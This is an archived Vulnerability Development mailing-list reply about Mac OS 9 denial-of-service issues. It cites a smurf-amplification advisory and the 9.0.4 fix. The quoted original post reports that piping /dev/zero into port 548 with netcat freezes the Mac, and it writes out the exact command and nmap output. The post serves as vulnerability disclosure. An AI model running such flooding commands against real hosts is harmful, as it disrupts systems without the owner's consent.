Vulnerability Development mailing list archives
Re: Apple Mac DoS
From: Ian Stoba <ian () BABCOCKBROWN COM>
Date: Thu, 14 Dec 2000 09:13:01 -0800
Mac OS 9.0 is subject to smurf amplification. Here's a link to the CERT advisory:

http://www.cert.org/advisories/CA-98.01.smurf.html

This is fixed in Mac OS 9.0.4. The update is freely available from Apple:

http://asu.info.apple.com/swupdates.nsf/artnum/n11617

Also, I happened to buy a copy of Mac OS 9 off the shelf in a CompUSA store this week and noticed that the version on the install CD was 9.0.4.

The Q wrote:
I have noticed some unusual behaviour with Mac OS 9. I am not a Mac user, so I apologize if this is a known bug. I have checked the archives and generally on the Net and can find no mention of this effect.

Anyway, a bit of background...

I was nmapping a Mac (running OS 9) to see if I could diagnose why an SMB connection couldn't be established. Not being familiar with Mac OS (at all), I telnetted to the open ports and didn't get a lot. Erm... then decided to try a netcat to each port.... (don't ask why)

Well, to cut a long story short, it causes a MASSIVE DoS on the Mac if you netcat /dev/zero to port 548 tcp. The machine needs a reset before it will respond. Surely this can't be right?

The details - ports open are:

testhost@testhost ]$ nmap 192.168.1.96 ## IP of a mac boxen

Starting nmap V. 2.53 by fyodor () insecure org ( www.insecure.org/nmap/ )
Interesting ports on (192.168.1.96):
(The 1521 ports scanned but not shown below are in state: closed)
Port       State       Service
427/tcp    open        svrloc
548/tcp    open        afpovertcp

Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds

To cause the DoS:

testhost@testhost ]$ ./nc -v 192.168.1.96 548 < /dev/zero

Caused massive DoS - mouse nonfunctional (important on a Mac :o)

Of course, when you stop the netcat the Mac returns to normal after 10-20 secs.
Current thread:
- Apple Mac DoS The Q (Dec 15)
- Re: Apple Mac DoS Jurriaan Kamer (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- Re: Apple Mac DoS Daniel J. Luke (Dec 15)
- Re: Apple Mac DoS Daniel Harrison (Dec 15)
- Re: Apple Mac DoS Martin Sunnerdahl (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- Re: Apple Mac DoS Daniel J. Luke (Dec 15)
- Re: Apple Mac DoS 3APA3A (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- <Possible follow-ups>
- Re: Apple Mac DoS Matteo,Marc A. (Dec 17)
- Re: Apple Mac DoS Daniel J. Luke (Dec 18)
- Re: Apple Mac DoS Matteo,Marc A. (Dec 18)
- Re: Apple Mac DoS Daniel J. Luke (Dec 18)
- Re: Apple Mac DoS Jurriaan Kamer (Dec 15)